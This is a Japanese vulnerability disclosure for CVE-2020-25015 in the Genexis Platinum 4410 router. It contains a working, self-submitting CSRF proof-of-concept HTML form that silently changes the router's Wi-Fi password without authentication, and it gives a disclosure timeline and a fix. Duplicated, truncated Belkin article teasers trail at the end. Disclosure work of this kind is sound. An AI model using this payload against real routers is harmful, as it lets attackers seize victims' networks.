Genexis Platinum 4410 Router V2.1 でアクセス制御と CSRF が壊れている
Genexis Platinum 4410 ホーム ルーター バージョン 2.1 (ソフトウェア バージョン P4410-V2-1.28) をテストしているときに、ルーターが Broken Access Control と CSRF に対して脆弱であることがわかりました。
CVE ID: CVE-2020-25015
まとめ
Platinum 4410 は、家庭で一般的に使用されている Genexis のコンパクトなルーターです。ハードウェア バージョン V2.1 – ソフトウェア バージョン P4410-V2-1.28 は、WIFI アクセス ポイントのパスワードをリモートで変更するために組み合わせることができる、Broken Access Control および CSRF に対して脆弱であることが判明しました。
CSRF の詳細については、こちらの記事をご覧ください。
影響
攻撃者は被害者にリンクを送信できます。攻撃者が脆弱なルーターから確立された WIFI ネットワークに接続しているときにクリックすると、CSRF エクスプロイトによって WIFI アクセス ポイントのパスワードが変更されます。ルーターはBroken Access Controlに対しても脆弱であるため、被害者はルーターのWebベースの設定ページ(192.168.1.1)にログインする必要がなく、基本的にワンクリックでハッキングされます.
脆弱性
理想的には、CSRF 攻撃が成功するには、被害者が攻撃を受けているアプリケーション (この場合は 192.168.1.1 の Web ベースのセットアップ ページ) にログインする必要があるため、この攻撃は厄介です。ルーター設定ページは、ユーザー セッションを自動的に終了します。さらに、お客様がルーターの設定ページにもアクセスすることはめったにありません。ただし、報告時のファームウェアの最新バージョンにはアクセス制御の脆弱性が壊れているため、パスワードを変更する要求は、認証されていない当事者によっても送信される可能性があります。
したがって、このバージョンのファームウェアで CSRF と Broken Access Control の脆弱性を組み合わせることで、攻撃者は次のコードを含む HTML ドキュメントを作成し、ユーザーにそれを送信するように仕向けることができます。
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
<input type="hidden" name="wlEnbl" value="ON" />
<input type="hidden" name="hwlKeys0" value="" />
<input type="hidden" name="hwlKeys1" value="" />
<input type="hidden" name="hwlKeys2" value="" />
<input type="hidden" name="hwlKeys3" value="" />
<input type="hidden" name="hwlgMode" value="9" />
<input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
<input type="hidden" name="hwlEnbl" value="1" />
<input type="hidden" name="hWPSMode" value="1" />
<input type="hidden" name="henableSsid" value="1" />
<input type="hidden" name="hwlHide" value="0" />
<input type="hidden" name="isInWPSing" value="0" />
<input type="hidden" name="WpsConfModeAll" value="7" />
<input type="hidden" name="WpsConfModeNone" value="0" />
<input type="hidden" name="hWpsStart" value="0" />
<input type="hidden" name="isCUCSupport" value="0" />
<input type="hidden" name="SSIDPre" value="N/A" />
<input type="hidden" name="bwControlhidden" value="0" />
<input type="hidden" name="ht_bw" value="1" />
<input type="hidden" name="wlgMode" value="b,g,n" />
<input type="hidden" name="wlChannel" value="0" />
<input type="hidden" name="wlTxPwr" value="1" />
<input type="hidden" name="wlSsidIdx" value="0" />
<input type="hidden" name="SSID_Flag" value="0" />
<input type="hidden" name="wlSsid" value="JINSON" />
<input type="hidden" name="wlMcs" value="33" />
<input type="hidden" name="bwControl" value="1" />
<input type="hidden" name="giControl" value="1" />
<input type="hidden" name="enableSsid" value="on" />
<input type="hidden" name="wlAssociateNum" value="32" />
<input type="hidden" name="wlSecurMode" value="WPAand11i" />
<input type="hidden" name="wlPreauth" value="off" />
<input type="hidden" name="wlNetReauth" value="1" />
<input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
<input type="hidden" name="cb_enablshowpsw" value="on" />
<input type="hidden" name="wlWpaGtkRekey" value="" />
<input type="hidden" name="wlRadiusIPAddr" value="" />
<input type="hidden" name="wlRadiusPort" value="" />
<input type="hidden" name="wlRadiusKey" value="" />
<input type="hidden" name="wlWpa" value="TKIPAES" />
<input type="hidden" name="wlKeyBit" value="64" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="WpsActive" value="0" />
<input type="hidden" name="wpsmode" value="ap-pbc" />
<input type="hidden" name="pinvalue" value="" />
<input type="hidden" name="Save_Flag" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
被害者が影響を受けたルーターによって確立された WiFi アクセス ポイントに接続されている限り、アクセス ポイントのパスワードは下のビデオに示すように変更されます。
タイムライン
- 2020 年 8 月 28 日に Genexis チームに報告された脆弱性
- チームは、2020 年 9 月 14 日に修正を含むファームウェアのリリースを確認しました
おすすめ
- Genexis チームによると、お客様は最新のファームウェアにアクセスするために ISP に連絡する必要があります。
- ファームウェアをアップグレードできない場合は、より安全なルーターを使用してください。
参照
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25015
- https://nvd.nist.gov/vuln/detail/CVE-2020-25015
-
Belkin ルーターで WI-FI アクセスがない
Belkin ルーターの WI-FI アクセスを使用してインターネットにアクセスすることはできません。 Belkin Router という用語は、世界で最も信頼されているルーター ブランドです。通常、n 個のデバイスに高速でスムーズなワイヤレス接続を提供します。 しかし最近では、Belkin ルーターを介して WI-FI にアクセスできないことが確認されています。この記事では、Belkin ルーターで WI-FI にアクセスする方法に関する完全なガイドを入手します。これがあなたがしなければならないことです。 Belkin Router への正常な接続は、主に Windows で構成されたネ
-
Belkin ルーターで WI-FI アクセスがない
Belkin ルーターの WI-FI アクセスを使用してインターネットにアクセスすることはできません。 Belkin Router という用語は、世界で最も信頼されているルーター ブランドです。通常、n 個のデバイスに高速でスムーズなワイヤレス接続を提供します。 しかし最近では、Belkin ルーターを介して WI-FI にアクセスできないことが確認されています。この記事では、Belkin ルーターで WI-FI にアクセスする方法に関する完全なガイドを入手します。これがあなたがしなければならないことです。 Belkin Router への正常な接続は、主に Windows で構成されたネ